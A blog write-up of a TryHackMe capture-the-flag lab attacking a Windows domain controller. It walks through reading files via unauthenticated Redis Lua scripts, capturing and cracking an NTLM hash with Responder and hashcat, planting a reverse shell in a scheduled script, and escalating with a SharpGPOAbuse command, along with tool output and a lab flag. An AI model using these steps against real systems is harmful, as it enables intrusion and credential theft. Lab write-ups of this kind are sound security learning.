C R E A T E & D E S T R OY

VulnNet Active | TryHackMe

53/tcp  open  domain        Simple DNS Plus
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-09-08T10:54:11
|_  start_date: N/A
6379/tcp  open  redis      Redis key-value store 2w
9389/tcp  open  mc-nmf     .NET Message Framing
49667/tcp open  msrpc      Microsoft Windows RPC
49668/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
49669/tcp open  msrpc      Microsoft Windows RPC
49670/tcp open  msrpc      Microsoft Windows RPC
49673/tcp open  msrpc      Microsoft Windows RPC
49692/tcp open  msrpc      Microsoft Windows RPC
49765/tcp open  msrpc      Microsoft Windows RPC

So, we’re probably looking at a domain controller judging by the DNS service running. Running crackmapexec gives us the domain name vulnnet.local which we’ll use to further enumerate the box.

SMB allows anonymous login but has no shares to display, but Redis allows unauthenticated logins.

edis-cli -h> config get dir
1) "dir"
2) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"

We can get a username from this but I spend a long time attempting various methods of RCE. Eventually I come across this page which gives information on Lua scripting. Initially I wonder if it can be used for a reverse shell but read that it can be used to read files on the local server. Trying to read some common Windows files gives errors but when looking at system32\etc\hosts it errors at the symbol #, knowing how the file should look this seems like it’s attempting to read and process the file.

edis-cli -h eval "dofile('c:\\\windows\\\system32\\\drivers\\\etc\\\hosts')" 0     
(error) ERR Error running script (call to f_6bbf051066d6329b897e50da35b0572543917ab4): @user_script:1: c:\windows\system32\drivers\etc\hosts:2: unexpected symbol near '#'

As a further test, and knowing the typical naming format for TryHackMe flags, we attempt to see if we can read the flag…

redis-cli -h eval "dofile('c:\\\users\\\enterprise-security\\\desktop\\\user.txt')" 0
(error) ERR Error running script (call to f_0a5fc213d32a52ab24b6bcf4d79058f7b03a659d): @user_script:1: c:\users\enterprise-security\desktop\user.txt:1: malformed number near '3eb176aee96432d5b100bc93580b291e' 

Weirdly it stripped the THM{} but otherwise output the flag.

After attempting lots of ways to get a file, I start an SMB server and see we can connect back to ourselves. This means we can start up Responder and hopefully grab the user’s hash!

We get the NetNTLMv2 hash back from responder, so can run it through hashcat and hopefully get our initial access.

hashcat -m 5600 enterprise-security /usr/share/wordlists/rockyou.txt --force                                                                     
hashcat (v6.2.5) starting  
Session..........: hashcat
Status...........: Cracked

Using our creds now we can start to further enumerate the box.

SMBmap shows us a folder we can access, so connecting to SMB we find one file “PurgeIrrelevantData_1826.ps1”. Downloading it and viewing it appears to just be a script, perhaps run as a scheduled task? Before trying this I test to see if we can get remote access any other way, which we don’t appear to be able to.

cat PurgeIrrelevantData_1826.ps1                                           
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue

Using my new favourite Windows Reverse Shell Generator we can modify the script and put it back on to the SMB share and wait…

Despite seeing our users having SeImpersonatePrivilege iurns out we can’t use PrintSpoofer here (despite me trying…), so it’s no easy wins. First thing I’ll do is run Bloodhound to get an idea of what we can exploit.

We can see that we’ve got write privileges over the GPO SECURITY-POL-VN. After much hunting I discover SharpGPOAbuse. A tool we can use to use to modify the GPO, and within it contains syntax for running the tool on a specific user or computer controlled by the vulnerable GPO, so with it we have:

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "PrivEsc" --Author vulnnet\Administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Enterprise-Share> get-aduser -identity enterprise-security -properties * | select MemberOf


Now with our new-found privileges we can PSExec into the server and grab the root flag.

This was a really informative box. I spent a significant amount of time getting the initial foothold and a while to figure out how to escalate. Lots of thanks to Google and the smart AD hackers out there!

Leave a Reply

Your email address will not be published. Required fields are marked *